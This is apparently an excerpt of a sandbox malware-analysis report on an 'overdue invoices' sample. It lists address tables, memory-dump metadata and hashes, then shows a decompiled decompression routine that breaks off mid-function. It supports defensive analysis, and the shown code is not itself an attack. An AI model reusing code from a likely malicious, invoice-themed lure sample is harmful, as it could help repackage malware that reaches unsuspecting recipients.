                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x004066b5
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00000000
                  0x00406828
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x00000000
                  0x0040667d
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                  • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                  • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
